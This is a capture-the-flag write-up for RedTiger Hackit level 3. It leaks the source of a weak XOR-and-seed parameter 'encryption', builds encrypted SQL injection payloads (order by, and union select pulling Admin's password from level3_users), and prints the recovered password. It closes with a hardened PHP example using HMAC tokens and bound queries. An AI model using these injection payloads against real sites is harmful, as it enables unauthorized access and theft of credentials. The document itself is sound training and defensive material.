• level 3


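    The challenge gives the user as Admin; the goal is to obtain Admin's password.

    Clicking TheCow and Admin shows that the usr parameter appears to be encrypted in some way.

    http://redtiger.labs.overthewire.org/level3.php?usr=MDQyMjExMDE0MTgyMTQw cannot be decoded directly.

    After reading an expert's write-up online, I found that the trick is to pass an array so that an error message is displayed.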

    usr[]=MDYzMjIzMDA2MTU2MTQxMjU0
    Warning: preg_match() expects parameter 2 to be string, array given in /var/www/html/hackit/urlcrypt.inc on line 26

    Download the urlcrypt.inc file:

    <?php
    
        // warning! ugly code ahead :)
              
        function encrypt($str)
        {
            $cryptedstr = "";
            srand(3284724);
            for ($i =0; $i < strlen($str); $i++)
            {
                $temp = ord(substr($str,$i,1)) ^ rand(0, 255);
                
                while(strlen($temp)<3)
                {
                    $temp = "0".$temp;
                }
                $cryptedstr .= $temp. "";
            }
            return base64_encode($cryptedstr);
        }
      
        function decrypt ($str)
        {
            srand(3284724);
            if(preg_match('%^[a-zA-Z0-9/+]*={0,2}$%',$str))
            {
                $str = base64_decode($str);
                if ($str != "" && $str != null && $str != false)
                {
                    $decStr = "";
                    
                    for ($i=0; $i < strlen($str); $i+=3)
                    {
                        $array[$i/3] = substr($str,$i,3);
                    }
    
                    foreach($array as $s)
                    {
                        $a = $s ^ rand(0, 255);
                        $decStr .= chr($a);
                    }
                    
                    return $decStr;
                }
                return false;
            }
            return false;
        }
    
    
    
    
        
    ?>

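    The incoming parameter is encrypted with a fixed rule (the seed passed to srand() is hard-coded), so the level can be solved by constructing a statement and then running it through the same encryption.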

    Admin' order by 7-- +
    After encryption:
    https://redtiger.labs.overthewire.org/level3.php?usr=MDQyMjExMDE0MTgyMTQwMTc0MjIzMDg3MjA4MTAxMTg0MTQyMDA5MTczMDA2MDY5MjMyMDc2MTc2MDc0MDM4
    1' union select 1,2,3,4,5,6,7#
    After encryption:
    https://redtiger.labs.overthewire.org/level3.php?usr=MDkwMTQ0MDY3MTcwMTQwMjI0MTQ0MDg2MTMwMTE0MTg0MTQ0MDc2MTcyMDExMDY5MjM4MDc3MTc1MDcwMDYyMTk5MjM1MjE5MDgxMjQ2MTUyMjA4MTc4M
    ' union select 1,password,2,3,4,5,6 from level3_users where username='Admin
    After encryption: MDc2MTUxMDIyMTc3MTM5MjMwMTQ1MDI0MjA5MTAwMTc3MTUzMDc0MTg3MDk1MDg0MjQzMDE3MjUyMDI1MTI2MTU2MTc2MTMzMDAwMjQ2MTU2MjA4MTgyMDk2MTI5MjIwMDQ5MDUyMjMwMTk4MTk2MTg5MTEzMDQxMjQwMTQ0MDM2MTQwMTY5MTcyMDgzMjQ0MDg3MTQxMTE1MDY2MTUzMjE0MDk1MDM4MTgxMTY1MDQ3MTE4MDg2MTQwMDM0MDg1MTE4MTE4MDk5MjIyMjE4MDEwMTkwMjIwMDcxMDQwMjIw

    This yields the password:

    thisisaverysecurepasswordEEE5rt

    Log in as Admin.

    Reference: https://www.jianshu.com/p/84d543cff8c0
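
    From the defender's side, the level combines three flaws: a warning that leaks the include path when usr is an array, a parameter that is only obfuscated with a hard-coded seed, and a decoded value that reaches the SQL text. The following is an added example, not code from the challenge or the original write-up, showing one hardened form of the same flow; make_token(), read_token(), lookup_user(), $key and the two-column SQLite table are assumptions made for illustration.

    ```php
    <?php
    // Added example (not the challenge's code): authenticated token + bound query.
    function make_token(string $user, string $key): string
    {
        // Authenticate the value instead of obfuscating it: HMAC-SHA256 tag + payload.
        $tag = hash_hmac('sha256', $user, $key, true);
        return base64_encode($tag . $user);
    }

    function read_token($token, string $key)
    {
        // usr[]=... arrives as an array; reject it so no warning or file path is emitted.
        if (!is_string($token)) {
            return false;
        }
        $raw = base64_decode($token, true);
        if ($raw === false || strlen($raw) <= 32) {
            return false;
        }
        $tag  = substr($raw, 0, 32);
        $user = substr($raw, 32);
        // Constant-time comparison; a client without $key cannot mint a valid token.
        return hash_equals(hash_hmac('sha256', $user, $key, true), $tag) ? $user : false;
    }

    function lookup_user(PDO $db, string $user)
    {
        // Bound parameter: the decoded value is data, never part of the SQL text.
        $stmt = $db->prepare('SELECT username FROM level3_users WHERE username = ?');
        $stmt->execute([$user]);
        return $stmt->fetchColumn();
    }

    // Constructed sample data in an in-memory SQLite database (hypothetical schema).
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec("CREATE TABLE level3_users (username TEXT, password TEXT)");
    $db->exec("INSERT INTO level3_users VALUES ('Admin', 'constructed'), ('TheCow', 'constructed')");
    $key = random_bytes(32); // server-side secret, never sent to the client

    $good   = make_token('Admin', $key);
    $forged = base64_encode(str_repeat("\0", 32) . "Admin' order by 7-- ");
    var_dump(lookup_user($db, read_token($good, $key))); // valid token resolves to a stored user
    var_dump(read_token($forged, $key));                 // tag mismatch: token is rejected
    var_dump(read_token(['x'], $key));                   // array input is rejected quietly
    ```

    Independently of the token format, display_errors should be off in production so that warnings such as the preg_match() one above go to the server log rather than the response.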

  • Original URL: https://www.cnblogs.com/xiaobai141/p/14130077.html